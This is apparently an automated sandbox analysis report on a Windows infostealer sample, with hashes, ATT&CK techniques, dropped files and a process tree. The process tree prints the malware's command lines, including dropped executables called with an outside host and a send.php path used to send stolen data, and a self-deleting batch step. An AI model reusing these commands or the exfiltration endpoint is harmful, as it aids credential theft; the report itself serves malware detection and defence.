9d60c9d3b13fe3415caa1df5ba3b674d48d8f47e0258748753bac70a59241b4c

Analysis

max time kernel
226s
max time network
336s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
05/12/2022, 11:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9d60c9d3b13fe3415caa1df5ba3b674d48d8f47e0258748753bac70a59241b4c.exe
Size

880KB
MD5

2f4a647a0bd5101c630c4e7e8a5954c0
SHA1

d2590cc75fc7ecdd525f52aa8932ec38e3faffec
SHA256

9d60c9d3b13fe3415caa1df5ba3b674d48d8f47e0258748753bac70a59241b4c
SHA512

49d16e02ea95ece01d14d4069f21898e893b9b91b18b613c44829bae74657c155840ff47854504e7f9833cc2aaf37540d3a08319fdba52dbe981fd628f75f270
SSDEEP

24576:lc+w/tEFKWwodmJ/fFo4NSBERSwx4bmnBp:lc+w/tWwjZUuSwxomnH

Score

8^/10

spyware stealer

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
1688	stpf.exe
1408	crgg.exe

Deletes itself 1 IoCs

pid	Process
1264	cmd.exe

Loads dropped DLL 3 IoCs

pid	Process
1172	9d60c9d3b13fe3415caa1df5ba3b674d48d8f47e0258748753bac70a59241b4c.exe
636	cmd.exe
704	cmd.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
1372	tasklist.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1408	crgg.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1372	tasklist.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 1172 wrote to memory of 636	1172	9d60c9d3b13fe3415caa1df5ba3b674d48d8f47e0258748753bac70a59241b4c.exe	28
PID 1172 wrote to memory of 636	1172	9d60c9d3b13fe3415caa1df5ba3b674d48d8f47e0258748753bac70a59241b4c.exe	28
PID 1172 wrote to memory of 636	1172	9d60c9d3b13fe3415caa1df5ba3b674d48d8f47e0258748753bac70a59241b4c.exe	28
PID 1172 wrote to memory of 636	1172	9d60c9d3b13fe3415caa1df5ba3b674d48d8f47e0258748753bac70a59241b4c.exe	28
PID 636 wrote to memory of 1688	636	cmd.exe	30
PID 636 wrote to memory of 1688	636	cmd.exe	30
PID 636 wrote to memory of 1688	636	cmd.exe	30
PID 636 wrote to memory of 1688	636	cmd.exe	30
PID 1172 wrote to memory of 704	1172	9d60c9d3b13fe3415caa1df5ba3b674d48d8f47e0258748753bac70a59241b4c.exe	32
PID 1172 wrote to memory of 704	1172	9d60c9d3b13fe3415caa1df5ba3b674d48d8f47e0258748753bac70a59241b4c.exe	32
PID 1172 wrote to memory of 704	1172	9d60c9d3b13fe3415caa1df5ba3b674d48d8f47e0258748753bac70a59241b4c.exe	32
PID 1172 wrote to memory of 704	1172	9d60c9d3b13fe3415caa1df5ba3b674d48d8f47e0258748753bac70a59241b4c.exe	32
PID 704 wrote to memory of 1408	704	cmd.exe	34
PID 704 wrote to memory of 1408	704	cmd.exe	34
PID 704 wrote to memory of 1408	704	cmd.exe	34
PID 704 wrote to memory of 1408	704	cmd.exe	34
PID 1172 wrote to memory of 1264	1172	9d60c9d3b13fe3415caa1df5ba3b674d48d8f47e0258748753bac70a59241b4c.exe	35
PID 1172 wrote to memory of 1264	1172	9d60c9d3b13fe3415caa1df5ba3b674d48d8f47e0258748753bac70a59241b4c.exe	35
PID 1172 wrote to memory of 1264	1172	9d60c9d3b13fe3415caa1df5ba3b674d48d8f47e0258748753bac70a59241b4c.exe	35
PID 1172 wrote to memory of 1264	1172	9d60c9d3b13fe3415caa1df5ba3b674d48d8f47e0258748753bac70a59241b4c.exe	35
PID 1264 wrote to memory of 1372	1264	cmd.exe	37
PID 1264 wrote to memory of 1372	1264	cmd.exe	37
PID 1264 wrote to memory of 1372	1264	cmd.exe	37
PID 1264 wrote to memory of 1372	1264	cmd.exe	37
PID 1264 wrote to memory of 688	1264	cmd.exe	38
PID 1264 wrote to memory of 688	1264	cmd.exe	38
PID 1264 wrote to memory of 688	1264	cmd.exe	38
PID 1264 wrote to memory of 688	1264	cmd.exe	38

C:\Users\Admin\AppData\Local\Temp\9d60c9d3b13fe3415caa1df5ba3b674d48d8f47e0258748753bac70a59241b4c.exe
"C:\Users\Admin\AppData\Local\Temp\9d60c9d3b13fe3415caa1df5ba3b674d48d8f47e0258748753bac70a59241b4c.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1172
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\stpf.exe.bat" stpf.exe 05e9c349e7e3dc9ab9724106f00e7e97 coca-cola.mistralaucanada.com /images/srvr/partner/send.php 6"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:636
- - C:\Users\Admin\AppData\Local\Temp\stpf.exe
    stpf.exe 05e9c349e7e3dc9ab9724106f00e7e97 coca-cola.mistralaucanada.com /images/srvr/partner/send.php 6
    3⤵
    - Executes dropped EXE
    PID:1688
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\crgg.exe.bat" crgg.exe coca-cola.mistralaucanada.com Everyday-English_-Uchebnoe-posobie.zip"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:704
- - C:\Users\Admin\AppData\Local\Temp\crgg.exe
    crgg.exe coca-cola.mistralaucanada.com Everyday-English_-Uchebnoe-posobie.zip
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:1408
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\9d60c9d3b13fe3415caa1df5ba3b674d48d8f47e0258748753bac70a59241b4c.exe.bat" 9d60c9d3b13fe3415caa1df5ba3b674d48d8f47e0258748753bac70a59241b4c.exe 1172"
  2⤵
  - Deletes itself
  - Suspicious use of WriteProcessMemory
  PID:1264
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /FI "PID eq 1172" /NH
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:1372
- - C:\Windows\SysWOW64\findstr.exe
    findstr /I "1172"
    3⤵
    PID:688

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Process Discovery

T1057

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\9d60c9d3b13fe3415caa1df5ba3b674d48d8f47e0258748753bac70a59241b4c.exe.bat

Filesize
133B

MD5
c39bba30a770a2bd81a113f216fb885b

SHA1
ef516547f0fa48b9da99adc657d05672859caee9

SHA256
f5a475a9aad4e57102e5af94e97ef74cef16ea1355817cd0128e49f0cc063833

SHA512
71ff9ad945be762bb7ab900d72eff6cbe4975d2474af83208897ddcb99ce4c0206b69cc878005544a95000d8b6bc7536409faffc8460b4a17ec4b67120258c26

Download Submit
C:\Users\Admin\AppData\Local\Temp\crgg.exe

Filesize
527KB

MD5
bde9af1112728f03fb34736c41a9e2fe

SHA1
f8682aba175a1615a724db6d97bc00ee5cb5376e

SHA256
88f397b3b792e20de3e6791dc498373a395d2cf7ea0b621b2034cb4f84934c6a

SHA512
d1592be1204b02984c44b50de569238b1027f8788260e265ab8a583abd8564c2cd88f8e84e3d649d1c9b447303984124d280981bde95cfbf1b2b22d5f7867c63

Download Submit
C:\Users\Admin\AppData\Local\Temp\crgg.exe

Filesize
527KB

MD5
bde9af1112728f03fb34736c41a9e2fe

SHA1
f8682aba175a1615a724db6d97bc00ee5cb5376e

SHA256
88f397b3b792e20de3e6791dc498373a395d2cf7ea0b621b2034cb4f84934c6a

SHA512
d1592be1204b02984c44b50de569238b1027f8788260e265ab8a583abd8564c2cd88f8e84e3d649d1c9b447303984124d280981bde95cfbf1b2b22d5f7867c63

Download Submit
C:\Users\Admin\AppData\Local\Temp\crgg.exe.bat

Filesize
86B

MD5
00294f1426be96f2ea6b23feec5acc16

SHA1
5bec735e1101ff2d6ffda3f81d1197bf1dcadbb5

SHA256
2b43ff6c52eb21fd4630b4417c2b3df4d8e7d57493636d7a5fa05c5b102b5a0c

SHA512
919fcc386bc2dd6c91fbead2cd6266c24fe957eda37095cf6cd794ba8749397d0366747f6555618e2aa8ca9a469f9be3ccae44e50dfdea46deaa4d0d26aafb9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\stpf.exe

Filesize
132KB

MD5
6eeeb6949ba62ad40a94eaca9c8edf48

SHA1
198ba7019c812df0df6319e48cd00f81c28bc6eb

SHA256
804001fabbbe6f6879b2c2fe4ecde7f9a3f8824c4d6fe896eeef9b8a7fb69307

SHA512
813759ef3a8ce9971aa6589bc754db8c536101376d2304ed3c561f903e722f0183c34df2d40af23667d9a2e37635d0f3a208c281deeb1088b21c6e4e7460ce79

Download Submit
C:\Users\Admin\AppData\Local\Temp\stpf.exe

Filesize
132KB

MD5
6eeeb6949ba62ad40a94eaca9c8edf48

SHA1
198ba7019c812df0df6319e48cd00f81c28bc6eb

SHA256
804001fabbbe6f6879b2c2fe4ecde7f9a3f8824c4d6fe896eeef9b8a7fb69307

SHA512
813759ef3a8ce9971aa6589bc754db8c536101376d2304ed3c561f903e722f0183c34df2d40af23667d9a2e37635d0f3a208c281deeb1088b21c6e4e7460ce79

Download Submit
C:\Users\Admin\AppData\Local\Temp\stpf.exe.bat

Filesize
86B

MD5
00294f1426be96f2ea6b23feec5acc16

SHA1
5bec735e1101ff2d6ffda3f81d1197bf1dcadbb5

SHA256
2b43ff6c52eb21fd4630b4417c2b3df4d8e7d57493636d7a5fa05c5b102b5a0c

SHA512
919fcc386bc2dd6c91fbead2cd6266c24fe957eda37095cf6cd794ba8749397d0366747f6555618e2aa8ca9a469f9be3ccae44e50dfdea46deaa4d0d26aafb9b

Download Submit
\Users\Admin\AppData\Local\Temp\crgg.exe

Filesize
527KB

MD5
bde9af1112728f03fb34736c41a9e2fe

SHA1
f8682aba175a1615a724db6d97bc00ee5cb5376e

SHA256
88f397b3b792e20de3e6791dc498373a395d2cf7ea0b621b2034cb4f84934c6a

SHA512
d1592be1204b02984c44b50de569238b1027f8788260e265ab8a583abd8564c2cd88f8e84e3d649d1c9b447303984124d280981bde95cfbf1b2b22d5f7867c63

Download Submit
\Users\Admin\AppData\Local\Temp\microdll.dll

Filesize
64KB

MD5
4c1b399df16773ce390009857eab8a71

SHA1
7c9e652379b1dce2ff9211645b75045884dd5bfb

SHA256
0686905220c593cad481559a41262e99559e8644501ba4a5969d495bb80a4edf

SHA512
09518de5c340c0c007f4581a9f7dd749caa9ad61de74a876ed1c5aa40b7aaad19218525040bd82cba049a32d32535ef3f201bbef633ec18c92d174a7f4100f7a

Download Submit
\Users\Admin\AppData\Local\Temp\stpf.exe

Filesize
132KB

MD5
6eeeb6949ba62ad40a94eaca9c8edf48

SHA1
198ba7019c812df0df6319e48cd00f81c28bc6eb

SHA256
804001fabbbe6f6879b2c2fe4ecde7f9a3f8824c4d6fe896eeef9b8a7fb69307

SHA512
813759ef3a8ce9971aa6589bc754db8c536101376d2304ed3c561f903e722f0183c34df2d40af23667d9a2e37635d0f3a208c281deeb1088b21c6e4e7460ce79

Download Submit
memory/1172-54-0x00000000757C1000-0x00000000757C3000-memory.dmp

Filesize
8KB

Download